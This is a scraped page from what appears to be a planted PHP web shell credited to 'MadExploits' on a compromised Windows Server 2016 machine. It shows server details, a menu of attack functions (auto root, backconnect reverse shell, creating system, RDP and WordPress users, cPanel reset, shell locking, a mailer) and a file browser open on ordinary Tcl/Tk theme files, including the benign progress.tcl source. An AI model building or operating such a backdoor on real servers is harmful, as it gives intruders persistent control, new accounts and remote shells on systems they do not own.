Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
bin /
git /
mingw64 /
lib /
tk8.6 /
ttk /
[ HOME SHELL ]
Name
Size
Permission
Action
altTheme.tcl
3.52
KB
-rw-rw-rw-
aquaTheme.tcl
3.42
KB
-rw-rw-rw-
button.tcl
2.86
KB
-rw-rw-rw-
clamTheme.tcl
4.55
KB
-rw-rw-rw-
classicTheme.tcl
3.66
KB
-rw-rw-rw-
combobox.tcl
11.98
KB
-rw-rw-rw-
cursors.tcl
4.51
KB
-rw-rw-rw-
defaults.tcl
4.31
KB
-rw-rw-rw-
entry.tcl
16.59
KB
-rw-rw-rw-
fonts.tcl
5.44
KB
-rw-rw-rw-
menubutton.tcl
6.3
KB
-rw-rw-rw-
notebook.tcl
5.44
KB
-rw-rw-rw-
panedwindow.tcl
2.15
KB
-rw-rw-rw-
progress.tcl
1.06
KB
-rw-rw-rw-
scale.tcl
2.63
KB
-rw-rw-rw-
scrollbar.tcl
3.17
KB
-rw-rw-rw-
sizegrip.tcl
2.34
KB
-rw-rw-rw-
spinbox.tcl
4.7
KB
-rw-rw-rw-
treeview.tcl
9.57
KB
-rw-rw-rw-
ttk.tcl
4.7
KB
-rw-rw-rw-
utils.tcl
8.24
KB
-rw-rw-rw-
vistaTheme.tcl
9.26
KB
-rw-rw-rw-
winTheme.tcl
2.72
KB
-rw-rw-rw-
xpTheme.tcl
1.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : progress.tcl
# # Ttk widget set: progress bar utilities. # namespace eval ttk::progressbar { variable Timers ;# Map: widget name -> after ID } # Autoincrement -- # Periodic callback procedure for autoincrement mode # proc ttk::progressbar::Autoincrement {pb steptime stepsize} { variable Timers if {![winfo exists $pb]} { # widget has been destroyed -- cancel timer unset -nocomplain Timers($pb) return } set Timers($pb) [after $steptime \ [list ttk::progressbar::Autoincrement $pb $steptime $stepsize] ] $pb step $stepsize } # ttk::progressbar::start -- # Start autoincrement mode. Invoked by [$pb start] widget code. # proc ttk::progressbar::start {pb {steptime 50} {stepsize 1}} { variable Timers if {![info exists Timers($pb)]} { Autoincrement $pb $steptime $stepsize } } # ttk::progressbar::stop -- # Cancel autoincrement mode. Invoked by [$pb stop] widget code. # proc ttk::progressbar::stop {pb} { variable Timers if {[info exists Timers($pb)]} { after cancel $Timers($pb) unset Timers($pb) } $pb configure -value 0 }
Close